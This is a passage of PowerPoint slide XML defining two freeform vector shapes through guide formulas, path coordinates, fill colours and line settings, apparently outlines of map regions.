                  <a:gd name="T61" fmla="*/ 28 h 33"/>
                  <a:gd name="T62" fmla="*/ 19 w 51"/>
                  <a:gd name="T63" fmla="*/ 29 h 33"/>
                  <a:gd name="T64" fmla="*/ 18 w 51"/>
                  <a:gd name="T65" fmla="*/ 31 h 33"/>
                  <a:gd name="T66" fmla="*/ 17 w 51"/>
                  <a:gd name="T67" fmla="*/ 32 h 33"/>
                  <a:gd name="T68" fmla="*/ 14 w 51"/>
                  <a:gd name="T69" fmla="*/ 32 h 33"/>
                  <a:gd name="T70" fmla="*/ 12 w 51"/>
                  <a:gd name="T71" fmla="*/ 32 h 33"/>
                  <a:gd name="T72" fmla="*/ 10 w 51"/>
                  <a:gd name="T73" fmla="*/ 31 h 33"/>
                  <a:gd name="T74" fmla="*/ 10 w 51"/>
                  <a:gd name="T75" fmla="*/ 32 h 33"/>
                  <a:gd name="T76" fmla="*/ 8 w 51"/>
                  <a:gd name="T77" fmla="*/ 32 h 33"/>
                  <a:gd name="T78" fmla="*/ 7 w 51"/>
                  <a:gd name="T79" fmla="*/ 33 h 33"/>
                  <a:gd name="T80" fmla="*/ 3 w 51"/>
                  <a:gd name="T81" fmla="*/ 32 h 33"/>
                  <a:gd name="T82" fmla="*/ 7 w 51"/>
                  <a:gd name="T83" fmla="*/ 28 h 33"/>
                  <a:gd name="T84" fmla="*/ 4 w 51"/>
                  <a:gd name="T85" fmla="*/ 21 h 33"/>
                  <a:gd name="T86" fmla="*/ 3 w 51"/>
                  <a:gd name="T87" fmla="*/ 15 h 33"/>
                  <a:gd name="T88" fmla="*/ 4 w 51"/>
                  <a:gd name="T89" fmla="*/ 11 h 33"/>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51"/>
                  <a:gd name="T136" fmla="*/ 0 h 33"/>
                  <a:gd name="T137" fmla="*/ 51 w 51"/>
                  <a:gd name="T138" fmla="*/ 33 h 33"/>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51" h="33">
                    <a:moveTo>
                      <a:pt x="3" y="8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="11" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35886" name="Freeform 420"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2933" y="2000"/>
                <a:ext cx="105" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 105"/>
                  <a:gd name="T1" fmla="*/ 52 h 62"/>
                  <a:gd name="T2" fmla="*/ 19 w 105"/>
                  <a:gd name="T3" fmla="*/ 49 h 62"/>
                  <a:gd name="T4" fmla="*/ 10 w 105"/>
                  <a:gd name="T5" fmla="*/ 42 h 62"/>
                  <a:gd name="T6" fmla="*/ 5 w 105"/>
                  <a:gd name="T7" fmla="*/ 35 h 62"/>
                  <a:gd name="T8" fmla="*/ 5 w 105"/>
                  <a:gd name="T9" fmla="*/ 26 h 62"/>
                  <a:gd name="T10" fmla="*/ 0 w 105"/>
                  <a:gd name="T11" fmla="*/ 20 h 62"/>
                  <a:gd name="T12" fmla="*/ 6 w 105"/>
                  <a:gd name="T13" fmla="*/ 17 h 62"/>
                  <a:gd name="T14" fmla="*/ 13 w 105"/>
                  <a:gd name="T15" fmla="*/ 13 h 62"/>
                  <a:gd name="T16" fmla="*/ 19 w 105"/>
                  <a:gd name="T17" fmla="*/ 9 h 62"/>
                  <a:gd name="T18" fmla="*/ 26 w 105"/>
                  <a:gd name="T19" fmla="*/ 7 h 62"/>
                  <a:gd name="T20" fmla="*/ 33 w 105"/>
                  <a:gd name="T21" fmla="*/ 4 h 62"/>
                  <a:gd name="T22" fmla="*/ 36 w 105"/>
                  <a:gd name="T23" fmla="*/ 0 h 62"/>
                  <a:gd name="T24" fmla="*/ 40 w 105"/>
                  <a:gd name="T25" fmla="*/ 5 h 62"/>
                  <a:gd name="T26" fmla="*/ 44 w 105"/>
                  <a:gd name="T27" fmla="*/ 2 h 62"/>
                  <a:gd name="T28" fmla="*/ 47 w 105"/>
                  <a:gd name="T29" fmla="*/ 0 h 62"/>
                  <a:gd name="T30" fmla="*/ 52 w 105"/>
                  <a:gd name="T31" fmla="*/ 6 h 62"/>
                  <a:gd name="T32" fmla="*/ 58 w 105"/>
                  <a:gd name="T33" fmla="*/ 9 h 62"/>
                  <a:gd name="T34" fmla="*/ 63 w 105"/>
                  <a:gd name="T35" fmla="*/ 9 h 62"/>
                  <a:gd name="T36" fmla="*/ 67 w 105"/>
                  <a:gd name="T37" fmla="*/ 11 h 62"/>
                  <a:gd name="T38" fmla="*/ 63 w 105"/>
                  <a:gd name="T39" fmla="*/ 15 h 62"/>
                  <a:gd name="T40" fmla="*/ 71 w 105"/>
                  <a:gd name="T41" fmla="*/ 23 h 62"/>
                  <a:gd name="T42" fmla="*/ 74 w 105"/>
                  <a:gd name="T43" fmla="*/ 16 h 62"/>
                  <a:gd name="T44" fmla="*/ 80 w 105"/>
                  <a:gd name="T45" fmla="*/ 17 h 62"/>
                  <a:gd name="T46" fmla="*/ 85 w 105"/>
                  <a:gd name="T47" fmla="*/ 21 h 62"/>
                  <a:gd name="T48" fmla="*/ 88 w 105"/>
                  <a:gd name="T49" fmla="*/ 26 h 62"/>
                  <a:gd name="T50" fmla="*/ 95 w 105"/>
                  <a:gd name="T51" fmla="*/ 26 h 62"/>
                  <a:gd name="T52" fmla="*/ 101 w 105"/>
                  <a:gd name="T53" fmla="*/ 32 h 62"/>
                  <a:gd name="T54" fmla="*/ 104 w 105"/>
                  <a:gd name="T55" fmla="*/ 37 h 62"/>
                  <a:gd name="T56" fmla="*/ 103 w 105"/>
                  <a:gd name="T57" fmla="*/ 38 h 62"/>
                  <a:gd name="T58" fmla="*/ 100 w 105"/>
                  <a:gd name="T59" fmla="*/ 38 h 62"/>
                  <a:gd name="T60" fmla="*/ 98 w 105"/>
                  <a:gd name="T61" fmla="*/ 41 h 62"/>
                  <a:gd name="T62" fmla="*/ 96 w 105"/>
                  <a:gd name="T63" fmla="*/ 42 h 62"/>
                  <a:gd name="T64" fmla="*/ 94 w 105"/>
                  <a:gd name="T65" fmla="*/ 45 h 62"/>
                  <a:gd name="T66" fmla="*/ 93 w 105"/>
                  <a:gd name="T67" fmla="*/ 48 h 62"/>
                  <a:gd name="T68" fmla="*/ 91 w 105"/>
                  <a:gd name="T69" fmla="*/ 49 h 62"/>
                  <a:gd name="T70" fmla="*/ 90 w 105"/>
                  <a:gd name="T71" fmla="*/ 52 h 62"/>
                  <a:gd name="T72" fmla="*/ 88 w 105"/>
                  <a:gd name="T73" fmla="*/ 52 h 62"/>
                  <a:gd name="T74" fmla="*/ 86 w 105"/>
                  <a:gd name="T75" fmla="*/ 53 h 62"/>
                  <a:gd name="T76" fmla="*/ 84 w 105"/>
                  <a:gd name="T77" fmla="*/ 54 h 62"/>
                  <a:gd name="T78" fmla="*/ 82 w 105"/>
                  <a:gd name="T79" fmla="*/ 54 h 62"/>
                  <a:gd name="T80" fmla="*/ 79 w 105"/>
                  <a:gd name="T81" fmla="*/ 53 h 62"/>
                  <a:gd name="T82" fmla="*/ 77 w 105"/>
                  <a:gd name="T83" fmla="*/ 54 h 62"/>
                  <a:gd name="T84" fmla="*/ 76 w 105"/>
                  <a:gd name="T85" fmla="*/ 57 h 62"/>
                  <a:gd name="T86" fmla="*/ 74 w 105"/>
                  <a:gd name="T87" fmla="*/ 58 h 62"/>
                  <a:gd name="T88" fmla="*/ 54 w 105"/>
                  <a:gd name="T89" fmla="*/ 55 h 62"/>
                  <a:gd name="T90" fmla="*/ 34 w 105"/>
                  <a:gd name="T91" fmla="*/ 62 h 62"/>
                  <a:gd name="T92" fmla="*/ 27 w 105"/>
                  <a:gd name="T93" fmla="*/ 59 h 62"/>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105"/>
                  <a:gd name="T142" fmla="*/ 0 h 62"/>
                  <a:gd name="T143" fmla="*/ 105 w 105"/>
                  <a:gd name="T144" fmla="*/ 62 h 62"/>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105" h="62">
                    <a:moveTo>
                      <a:pt x="27" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="59"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35887" name="Freeform 421"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2933" y="2000"/>
                <a:ext cx="105" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 105"/>
                  <a:gd name="T1" fmla="*/ 52 h 62"/>
                  <a:gd name="T2" fmla="*/ 19 w 105"/>
                  <a:gd name="T3" fmla="*/ 49 h 62"/>
                  <a:gd name="T4" fmla="*/ 10 w 105"/>
                  <a:gd name="T5" fmla="*/ 42 h 62"/>
                  <a:gd name="T6" fmla="*/ 5 w 105"/>
                  <a:gd name="T7" fmla="*/ 35 h 62"/>
                  <a:gd name="T8" fmla="*/ 5 w 105"/>
                  <a:gd name="T9" fmla="*/ 26 h 62"/>
                  <a:gd name="T10" fmla="*/ 0 w 105"/>
                  <a:gd name="T11" fmla="*/ 20 h 62"/>
                  <a:gd name="T12" fmla="*/ 6 w 105"/>
                  <a:gd name="T13" fmla="*/ 17 h 62"/>
                  <a:gd name="T14" fmla="*/ 13 w 105"/>
                  <a:gd name="T15" fmla="*/ 13 h 62"/>
                  <a:gd name="T16" fmla="*/ 19 w 105"/>
                  <a:gd name="T17" fmla="*/ 9 h 62"/>
                  <a:gd name="T18" fmla="*/ 26 w 105"/>
                  <a:gd name="T19" fmla="*/ 7 h 62"/>
                  <a:gd name="T20" fmla="*/ 33 w 105"/>
                  <a:gd name="T21" fmla="*/ 4 h 62"/>
                  <a:gd name="T22" fmla="*/ 36 w 105"/>
                  <a:gd name="T23" fmla="*/ 0 h 62"/>
                  <a:gd name="T24" fmla="*/ 40 w 105"/>
                  <a:gd name="T25" fmla="*/ 5 h 62"/>
                  <a:gd name="T26" fmla="*/ 44 w 105"/>
                  <a:gd name="T27" fmla="*/ 2 h 62"/>
